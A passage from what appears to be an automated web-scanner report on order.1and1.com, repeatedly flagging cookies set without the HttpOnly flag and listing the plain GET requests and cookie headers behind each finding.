__PFIX_TST_=3cd2f340f5d83400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDriving HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDriving;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=6f93047c1ec73800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDsc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2e6b9e6419f16800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingElements HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMailinglist;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=19d9d648f2500000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMailinglist HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=9f2e578a0ee4400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingMap HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=6f0d5596d7138000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingNet HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=625c83a492d9a400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingPhotogallery HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingRss;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=413ff73ef856c000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingRss HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=140b368813868c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingWsb HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5729a5342aeda400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureToolsRatepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
